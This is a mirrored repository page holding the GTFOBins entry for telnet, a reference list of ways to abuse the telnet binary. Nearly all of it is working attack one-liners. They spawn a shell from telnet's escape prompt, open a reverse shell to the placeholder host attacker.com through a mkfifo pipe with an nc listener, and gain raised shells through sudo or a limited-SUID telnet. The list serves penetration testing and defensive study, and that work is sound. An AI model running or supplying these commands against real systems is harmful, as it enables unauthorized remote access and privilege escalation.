1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-05-24 08:16:02 +02:00
GTFOBins.github.io/_gtfobins/telnet.md
2018-10-05 18:55:38 +01:00

860 B

functions
shell reverse-shell sudo limited-suid
description code
BSD version only. Needs to be connected first. RHOST=attacker.com RPORT=12345 telnet $RHOST $RPORT ^] !/bin/sh
description code
Run `nc -l -p 12345` on the attacker box to receive the shell. RHOST=attacker.com RPORT=12345 TF=$(mktemp -u) mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/sh 1>$TF
description code
BSD version only. Needs to be connected first. RHOST=attacker.com RPORT=12345 sudo telnet $RHOST $RPORT ^] !/bin/sh
description code
BSD version only. Needs to be connected first. RHOST=attacker.com RPORT=12345 ./telnet $RHOST $RPORT ^] !/bin/sh